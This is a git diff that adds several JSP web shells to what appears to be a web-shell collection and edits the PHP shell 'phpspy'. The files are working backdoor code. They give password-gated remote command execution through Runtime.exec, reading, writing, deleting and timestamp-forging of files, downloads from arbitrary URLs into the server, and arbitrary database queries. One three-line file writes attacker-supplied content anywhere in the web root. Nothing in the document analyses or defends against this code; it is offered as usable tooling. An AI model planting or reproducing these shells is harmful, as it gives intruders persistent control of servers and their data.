+response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
"),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> \ No newline at end of file diff --git a/jsp/info.jsp b/jsp/info.jsp new file mode 100644 index 0000000..6a7de64 --- /dev/null +++ b/jsp/info.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="fuckQ"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> diff --git a/jsp/mg.jsp b/jsp/mg.jsp new file mode 100644 index 0000000..7c9cbe4 --- /dev/null +++ b/jsp/mg.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="xc"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/utils.jsp b/jsp/utils.jsp new file mode 100644 index 0000000..a35c274 --- /dev/null +++ b/jsp/utils.jsp @@ -0,0 +1,297 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%!String Pwd = "beyond2012*_*"; + + String EC(String s, String c) throws Exception { + return s; + }//new String(s.getBytes("ISO-8859-1"),c);} + + Connection GC(String s) throws Exception { + String[] x = s.trim().split("\r\n"); + Class.forName(x[0].trim()).newInstance(); + Connection c = DriverManager.getConnection(x[1].trim()); + if (x.length > 2) { + c.setCatalog(x[2].trim()); + } + return c; + } + + void AA(StringBuffer sb) throws Exception { + File r[] = File.listRoots(); + for (int i = 0; i < r.length; i++) { + sb.append(r[i].toString().substring(0, 2)); + } + } + + void BB(String s, StringBuffer sb) throws Exception { + File oF = new File(s), l[] = oF.listFiles(); + String sT, sQ, sF = ""; + java.util.Date dt; + SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); + for (int i = 0; i < l.length; i++) { + dt = new java.util.Date(l[i].lastModified()); + sT = fm.format(dt); + sQ = l[i].canRead() ? "R" : ""; + sQ += l[i].canWrite() ? " W" : ""; + if (l[i].isDirectory()) { + sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length() + + "\t" + sQ + "\n"); + } else { + sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" + + sQ + "\n"; + } + } + sb.append(sF); + } + + void EE(String s) throws Exception { + File f = new File(s); + if (f.isDirectory()) { + File x[] = f.listFiles(); + for (int k = 0; k < x.length; k++) { + if (!x[k].delete()) { + EE(x[k].getPath()); + } + } + } + f.delete(); + } + + void FF(String s, HttpServletResponse r) throws Exception { + int n; + byte[] b = new byte[512]; + r.reset(); + ServletOutputStream os = r.getOutputStream(); + BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); + os.write(("->" + "|").getBytes(), 0, 3); + while ((n = is.read(b, 0, 512)) != -1) { + os.write(b, 0, n); + } + os.write(("|" + "<-").getBytes(), 0, 3); + os.close(); + is.close(); + } + + void GG(String s, String d) throws Exception { + String h = "0123456789ABCDEF"; + int n; + File f = new File(s); + f.createNewFile(); + FileOutputStream os = new FileOutputStream(f); + for (int i = 0; i < d.length(); i += 2) { + os + .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d + .charAt(i + 1)))); + } + os.close(); + } + + void HH(String s, String d) throws Exception { + File sf = new File(s), df = new File(d); + if (sf.isDirectory()) { + if (!df.exists()) { + df.mkdir(); + } + File z[] = sf.listFiles(); + for (int j = 0; j < z.length; j++) { + HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); + } + } else { + FileInputStream is = new FileInputStream(sf); + FileOutputStream os = new FileOutputStream(df); + int n; + byte[] b = new byte[512]; + while ((n = is.read(b, 0, 512)) != -1) { + os.write(b, 0, n); + } + is.close(); + os.close(); + } + } + + void II(String s, String d) throws Exception { + File sf = new File(s), df = new File(d); + sf.renameTo(df); + } + + void JJ(String s) throws Exception { + File f = new File(s); + f.mkdir(); + } + + void KK(String s, String t) throws Exception { + File f = new File(s); + SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); + java.util.Date dt = fm.parse(t); + f.setLastModified(dt.getTime()); + } + + void LL(String s, String d) throws Exception { + URL u = new URL(s); + int n; + FileOutputStream os = new FileOutputStream(d); + HttpURLConnection h = (HttpURLConnection) u.openConnection(); + InputStream is = h.getInputStream(); + byte[] b = new byte[512]; + while ((n = is.read(b, 0, 512)) != -1) { + os.write(b, 0, n); + } + os.close(); + is.close(); + h.disconnect(); + } + + void MM(InputStream is, StringBuffer sb) throws Exception { + String l; + BufferedReader br = new BufferedReader(new InputStreamReader(is)); + while ((l = br.readLine()) != null) { + sb.append(l + "\r\n"); + } + } + + void NN(String s, StringBuffer sb) throws Exception { + Connection c = GC(s); + ResultSet r = c.getMetaData().getCatalogs(); + while (r.next()) { + sb.append(r.getString(1) + "\t"); + } + r.close(); + c.close(); + } + + void OO(String s, StringBuffer sb) throws Exception { + Connection c = GC(s); + String[] t = { "TABLE" }; + ResultSet r = c.getMetaData().getTables(null, null, "%", t); + while (r.next()) { + sb.append(r.getString("TABLE_NAME") + "\t"); + } + r.close(); + c.close(); + } + + void PP(String s, StringBuffer sb) throws Exception { + String[] x = s.trim().split("\r\n"); + Connection c = GC(s); + Statement m = c.createStatement(1005, 1007); + ResultSet r = m.executeQuery("select * from " + x[3]); + ResultSetMetaData d = r.getMetaData(); + for (int i = 1; i <= d.getColumnCount(); i++) { + sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) + + ")\t"); + } + r.close(); + m.close(); + c.close(); + } + + void QQ(String cs, String s, String q, StringBuffer sb) throws Exception { + int i; + Connection c = GC(s); + Statement m = c.createStatement(1005, 1008); + try { + ResultSet r = m.executeQuery(q); + ResultSetMetaData d = r.getMetaData(); + int n = d.getColumnCount(); + for (i = 1; i <= n; i++) { + sb.append(d.getColumnName(i) + "\t|\t"); + } + sb.append("\r\n"); + while (r.next()) { + for (i = 1; i <= n; i++) { + sb.append(EC(r.getString(i), cs) + "\t|\t"); + } + sb.append("\r\n"); + } + r.close(); + } catch (Exception e) { + sb.append("Result\t|\t\r\n"); + try { + m.executeUpdate(q); + sb.append("Execute Successfully!\t|\t\r\n"); + } catch (Exception ee) { + sb.append(ee.toString() + "\t|\t\r\n"); + } + } + m.close(); + c.close(); + }%> + + +<% + String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; + request.setCharacterEncoding(cs); + response.setContentType("text/html;charset=" + cs); + String Z = EC(request.getParameter(Pwd) + "", cs); + String z1 = EC(request.getParameter("z1") + "", cs); + String z2 = EC(request.getParameter("z2") + "", cs); + StringBuffer sb = new StringBuffer(""); + try { + sb.append("->" + "|"); + if (Z.equals("A")) { + String s = new File(application.getRealPath(request + .getRequestURI())).getParent(); + sb.append(s + "\t"); + if (!s.substring(0, 1).equals("/")) { + AA(sb); + } + } else if (Z.equals("B")) { + BB(z1, sb); + } else if (Z.equals("C")) { + String l = ""; + BufferedReader br = new BufferedReader( + new InputStreamReader(new FileInputStream(new File( + z1)))); + while ((l = br.readLine()) != null) { + sb.append(l + "\r\n"); + } + br.close(); + } else if (Z.equals("D")) { + BufferedWriter bw = new BufferedWriter( + new OutputStreamWriter(new FileOutputStream( + new File(z1)))); + bw.write(z2); + bw.close(); + sb.append("1"); + } else if (Z.equals("E")) { + EE(z1); + sb.append("1"); + } else if (Z.equals("F")) { + FF(z1, response); + } else if (Z.equals("G")) { + GG(z1, z2); + sb.append("1"); + } else if (Z.equals("H")) { + HH(z1, z2); + sb.append("1"); + } else if (Z.equals("I")) { + II(z1, z2); + sb.append("1"); + } else if (Z.equals("J")) { + JJ(z1); + sb.append("1"); + } else if (Z.equals("K")) { + KK(z1, z2); + sb.append("1"); + } else if (Z.equals("L")) { + LL(z1, z2); + sb.append("1"); + } else if (Z.equals("M")) { + String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; + Process p = Runtime.getRuntime().exec(c); + MM(p.getInputStream(), sb); + MM(p.getErrorStream(), sb); + } else if (Z.equals("N")) { + NN(z1, sb); + } else if (Z.equals("O")) { + OO(z1, sb); + } else if (Z.equals("P")) { + PP(z1, sb); + } else if (Z.equals("Q")) { + QQ(cs, z1, z2, sb); + } + } catch (Exception e) { + sb.append("ERROR" + ":// " + e.toString()); + } + sb.append("|" + "<-"); + out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/zx.jsp b/jsp/zx.jsp new file mode 100644 index 0000000..5b92e03 --- /dev/null +++ b/jsp/zx.jsp @@ -0,0 +1,3 @@ +<% +if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); +%> diff --git a/php/phpspy/2013未加密.php b/php/phpspy/2013未加密.php index ee3f85d..6e927aa 100644 --- a/php/phpspy/2013未加密.php +++ b/php/phpspy/2013未加密.php @@ -23,24 +23,24 @@ if( IS_GPC ) { } $P = $_POST; unset($_POST); -/*===================== =====================*/ +/*===================== 程序配置 =====================*/ //echo encode_pass('angel');exit; //angel = ec38fe2a8497e0a8d6d349b3533038cb -// Ҫ֤,޸ĵ½,ΪҪ֤ +// 如果需要密码验证,请修改登陆密码,留空为不需要验证 $pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel -// cookie ÷ΧҪ, ¼, ޸, 뱣Ĭ -// cookie ǰ׺ +//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认 +// cookie 前缀 $cookiepre = ''; -// cookie +// cookie 作用域 $cookiedomain = ''; -// cookie · +// cookie 作用路径 $cookiepath = '/'; -// cookie Ч +// cookie 有效期 $cookielife = 86400; -/*===================== ý =====================*/ +/*===================== 配置结束 =====================*/ $charsetdb = array( 'big5' => 'big5', @@ -69,7 +69,7 @@ if (isset($charsetdb[$charset])) { $timestamp = time(); -/* ֤ */ +/* 身份验证 */ if ($act == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: '.SELF); @@ -91,14 +91,14 @@ if($pass) { loginpage(); } } -/* ֤ */ +/* 验证结束 */ $errmsg = ''; $uchar = '▲'; $dchar = '▼'; !$act && $act = 'file'; -//ǰĿ¼/ùĿ¼/վĿ¼ +//当前目录/设置工作目录/网站根目录 $home_cwd = getcwd(); if (isset($P['cwd']) && $P['cwd']) { chdir($P['cwd']); @@ -116,7 +116,7 @@ foreach (array('web_cwd','cwd','home_cwd') as $k) { } } -// 鿴PHPINFO +// 查看PHPINFO if ($act == 'phpinfo') { if (IS_PHPINFO) { phpinfo(); @@ -318,49 +318,49 @@ $errmsg && m($errmsg); if ($act == 'file') { - // жϵǰĿ¼д + // 判断当前目录可写情况 $dir_writeable = @is_writable($cwd) ? 'Writable' : 'Non-writable'; if (isset($p1)) { switch($p1) { case 'createdir': - // Ŀ¼ + // 创建目录 if ($p2) { m('Directory created '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed')); } break; case 'uploadFile': - // ϴļ + // 上传文件 m('File upload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'], $cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); break; case 'fileperm': - // ༭ļ + // 编辑文件属性 if ($p2 && $p3) { $p3 = base_convert($p3, 8, 10); m('Set file permissions '.(@chmod($p2, $p3) ? 'success' : 'failed')); } break; case 'rename': - // + // 改名 if ($p2 && $p3) { m($p3.' renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed')); } break; case 'clonetime': - // ¡ʱ + // 克隆时间 if ($p2 && $p3) { $time = @filemtime($p3); m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed')); } break; case 'settime': - // Զʱ + // 自定义时间 if ($p2 && $p3) { $time = strtotime($p3); m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed')); } break; case 'delete': - // ɾļ + // 批量删除文件 if ($P['dl']) { $succ = $fail = 0; foreach ($P['dl'] as $f) { @@ -410,7 +410,7 @@ if ($act == 'file') { } echo ""; } - // + //操作完毕 $free = @disk_free_space($cwd); !$free && $free = 0; $all = @disk_total_space($cwd); @@ -511,14 +511,14 @@ function shownav(e){ p('Action'); p(''); - //鿴пдļĿ¼ + //查看所有可写文件和目录 $dirdata=$filedata=array(); if ($p4 == 'dir') { $dirdata = GetWDirList($cwd); $filedata = array(); } else { - // ĬĿ¼б + // 默认目录列表 $dirs = @scandir($cwd); if ($dirs) { $dirs = array_diff($dirs, array('.')); @@ -673,17 +673,17 @@ elseif ($act == 'mysqladmin') { if ($dbhost && $dbuser && isset($dbpass)) { - // ʼݿ + // 初始化数据库类 $DB = new DB_MySQL; $DB->charsetdb = $charsetdb; $DB->charset = $charset; $DB->connect($dbhost, $dbuser, $dbpass, $dbname); - //ȡݿϢ + //获取数据库信息 p('

MySQL '.$DB->version().' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); $highver = $DB->version() > '4.1' ? 1 : 0; - //ȡݿ + //获取数据库 $query = $DB->query("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; @@ -736,7 +736,7 @@ elseif ($act == 'mysqladmin') { while($mn = $DB->fetch($result)){ $thisbg = bg(); p(''); - //ȡ¼ + //读取记录用 foreach($mn as $key=>$inside){ p(''.(($inside == null) ? 'null' : html_clean($inside)).''); } @@ -925,7 +925,7 @@ elseif ($act == 'eval') { elseif ($act == 'editfile') { - // ༭ļ + // 编辑文件 if ($p1 == 'edit' && $p2 && $p3) { $fp = @fopen($p2,'w'); m('Save file '.(@fwrite($fp,$p3) ? 'success' : 'failed')); @@ -1094,7 +1094,7 @@ else { ", $content); @@ -1199,7 +1199,7 @@ function html_clean($content) { return $content; } -// ȡȨ +// 获取权限 function getChmod($file){ return substr(base_convert(@fileperms($file),10,8),-4); } @@ -1265,7 +1265,7 @@ function copy_paste($c,$f,$d){ copy($c.$f, $d.$f); } } -// ɾĿ¼ +// 删除目录 function deltree($deldir) { $dirs = @scandir($deldir); if ($dirs) { @@ -1286,7 +1286,7 @@ function deltree($deldir) { } } -// мıɫ滻 +// 表格行间的背景色替换 function bg() { global $bgc; return ($bgc++%2==0) ? 'alt1' : 'alt2'; @@ -1301,7 +1301,7 @@ function cmp($a, $b) { } } -// ȡǰĿ¼ϼĿ¼ +// 获取当前目录的上级目录 function getUpPath($cwd) { $pathdb = explode('/', $cwd); $num = count($pathdb); @@ -1313,7 +1313,7 @@ function getUpPath($cwd) { return $uppath; } -// PHPò +// 检查PHP配置参数 function getcfg($varname) { $result = get_cfg_var($varname); if ($result == 0) { @@ -1325,7 +1325,7 @@ function getcfg($varname) { } } -// ļչ +// 获得文件扩展名 function getext($file) { $info = pathinfo($file); return $info['extension']; @@ -1436,7 +1436,7 @@ function encode_pass($pass) { $pass = md5($k.$pass); $pass = md5($pass.$k); $pass = md5($k.$pass.$k); - return $pass; + echo $pass; } function pr($a) { @@ -1546,7 +1546,7 @@ class DB_MySQL { $s = str_replace('\'', '\'\'', $s); return $s; } - // ݿ + // 备份数据库 function sqldump($table, $fp=0) { $crlf = (IS_WIN ? "\r\n" : "\n"); $search = array("\x00", "\x0a", "\x0d", "\x1a"); //\x08\\x09, not required